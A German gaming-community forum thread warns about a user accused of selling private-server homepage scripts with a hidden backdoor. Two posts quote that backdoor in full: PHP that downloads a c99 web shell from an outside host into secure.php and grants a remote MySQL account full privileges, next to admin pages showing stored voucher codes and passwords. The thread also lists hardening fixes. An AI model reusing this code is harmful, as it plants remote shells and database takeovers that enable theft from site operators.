[ WARNUNG VOR SONIICE ]

Nick · 08/26/2011, 15:38

SoNiiCe was pwnd by .Infinity (15:36)

~~xdjdarkboyx~~ · 08/26/2011, 15:48

sry aber so ne drecksau von Sonice. wurde auch abgezockt hab zwar net seine page aber dann ist es der hatt jemadn auch komischerweiße das der jenige die psc in MR green konto einzahlt wenn ja dann find ich dich sonice.

Nick · 08/26/2011, 16:13

Jetzt ist er nicht mehr Sooo nice

.Hazel · 08/26/2011, 16:17

Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!

John Schmieri · 08/26/2011, 16:18

Quote:

Originally Posted by .Hazel

Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!

Der erste Satz klingt so als ob SoNiice die Section ist? : D

.Hazel · 08/26/2011, 16:26

Quote:

Originally Posted by Cy.

Der erste Satz klingt so als ob SoNiice die Section ist? : D

Nein, aber er ist ein Teil der Section und jeder Teil, wirft ein Bild auf diese Section, SoNiice wirft halt ein schlechtes Bild - Henni ein gutes, ein sogar sehr gutes.
Es ist halt aber einfach so, dass sich viele in dieser Section zu Ars****chern entwickelt haben!

~~.Koopa~~ · 08/26/2011, 17:04

Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?

wenn es peer externer php datei ist könnte man die ja eig. löschen

yym3 · 08/26/2011, 17:13

Quote:

Originally Posted by .Koopa

Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?

wenn es peer externer php datei ist könnte man die ja eig. löschen

dacht ich auch, rankings.php aufmachen löschen und gucken ob sich was ändert :O

.Yacki · 08/26/2011, 17:33

Hach ja... SoNiice...

Irgendwas war da schon immer faul...

.Risan. · 08/26/2011, 18:08

hmm:

PHP Code:


			
    if (isset($_GET['re']) == 'secure') {
    $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 
    $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);
}

$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'";
mysql_query ($user);  
    
    $x++;
    
  }
?>
<?PHP
if (isset($_GET['db']) == 'psc') {
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log
      ORDER BY psc_log.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log 
      ORDER BY psc_log.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC = mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" : "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" : "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
elseif (isset($_GET['db']) == 'paysafe') {    
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC = mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" : "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" : "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
?>

bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..

~~.Tolive~~ · 08/26/2011, 18:20

Quote:

Originally Posted by .Dauni

Ich hab kein Bock jetz alles zu lesen, aber Marcel, halt die Fresse, halt sie einfach.

Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.

Quote:

Originally Posted by Risan

Au man.. hätte ich mal paar Dateien früher angeschaut, wäre der ganze ärger erspart geblieben. Lieber Marcel Weber.

Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.

Quote:

Originally Posted by .Hazel

Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!

Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.

~~Scrawler™~~ · 08/26/2011, 18:38

Quote:

Originally Posted by Risan

hmm:

PHP Code:

if (isset($_GET['re']) == 'secure') { $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei); } $user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'"; mysql_query ($user); $x++; } ?> <?PHP if (isset($_GET['db']) == 'psc') { echo '<h2>Admin - Voucher Datenbank</h2>'; echo '<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> • <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>'; echo '<table> <tr> <th class="topLine">ID</th> <th class="topLine">Account</th> <th class="topLine">Admin</th> <th class="topLine">Voucher</th> <th class="topLine">Betrag</th> <th class="topLine">Status</th> <th class="topLine">Passwort</th> <th class="topLine">Datum</th> </tr>'; if(isset($_GET['closed']) && $_GET['closed']=="yes") { $sqlCmd="SELECT * FROM ".SQL_HP_DB.".psc_log ORDER BY psc_log.datum DESC"; } else { $sqlCmd="SELECT * FROM ".SQL_HP_DB.".psc_log ORDER BY psc_log.datum DESC"; } $sqlQry=mysql_query($sqlCmd,$sqlHp); $x=0; while($getPSC = mysql_fetch_object($sqlQry)) { $zF = ($x%2) ? "tdunkel" : "thell"; $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" : "<span style=\"color:#613802\">Offen</span>"; echo '<tr> <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td> <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td> <td class="'.$zF.'">('.$getPSC->card_type.') '; echo htmlspecialchars(substr($getPSC->psc_code,0,16)); if(strlen($getPSC->psc_code)>16) echo'...'; echo'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td> <td class="'.$zF.'">'.$pscStatus.'</td> <td class="'.$zF.'">'.$getPSC->psc_pass.'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td> </tr>'; $x++; } echo '</table>'; } elseif (isset($_GET['db']) == 'paysafe') { echo '<h2>Admin - Voucher Datenbank</h2>'; echo '<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> • <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>'; echo '<table> <tr> <th class="topLine">ID</th> <th class="topLine">Account</th> <th class="topLine">Admin</th> <th class="topLine">Voucher</th> <th class="topLine">Betrag</th> <th class="topLine">Status</th> <th class="topLine">Passwort</th> <th class="topLine">Datum</th> </tr>'; if(isset($_GET['closed']) && $_GET['closed']=="yes") { $sqlCmd="SELECT * FROM ".SQL_HP_DB.".paysafe_logg ORDER BY paysafe_logg.datum DESC"; } else { $sqlCmd="SELECT * FROM ".SQL_HP_DB.".paysafe_logg ORDER BY paysafe_logg.datum DESC"; } $sqlQry=mysql_query($sqlCmd,$sqlHp); $x=0; while($getPSC = mysql_fetch_object($sqlQry)) { $zF = ($x%2) ? "tdunkel" : "thell"; $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" : "<span style=\"color:#613802\">Offen</span>"; echo '<tr> <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td> <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td> <td class="'.$zF.'">('.$getPSC->card_type.') '; echo htmlspecialchars(substr($getPSC->psc_code,0,16)); if(strlen($getPSC->psc_code)>16) echo'...'; echo'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td> <td class="'.$zF.'">'.$pscStatus.'</td> <td class="'.$zF.'">'.$getPSC->psc_pass.'</td> <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td> </tr>'; $x++; } echo '</table>'; } ?>

bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..

zu deinem 5. punkt kann ich nur sagen das es 0 bringt^^

guck dir mal den auszug aus der c99.txt an:

PHP Code:


			
//Authentication

$login = ""; //login

//DON'T FORGOT ABOUT PASSWORD!!!

$pass = ""; //password

$md5_pass = ""; //md5-cryped pass. if null, md5($pass)



$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

$login_txt = "Restricted area"; //http-auth message.

$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";

.Hazel · 08/26/2011, 18:45

Quote:

Originally Posted by .Tolive

Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.

Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.

Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.

Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.

Hermes2012 · 08/26/2011, 18:48

Danke

vor solchen leuten muss man gewarnt werden ich bin für einen Bann von ihm weil er in der community viren verbreitet mfg Hermes2012

~~.Tolive~~ · 08/26/2011, 18:59

Quote:

Originally Posted by .Hazel

Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.

Deswegen sagte ich das ja auch. Wenn man zurück denkt, war Dauni nie anders

Aber Allgemein, jeder Server zockt nur ab.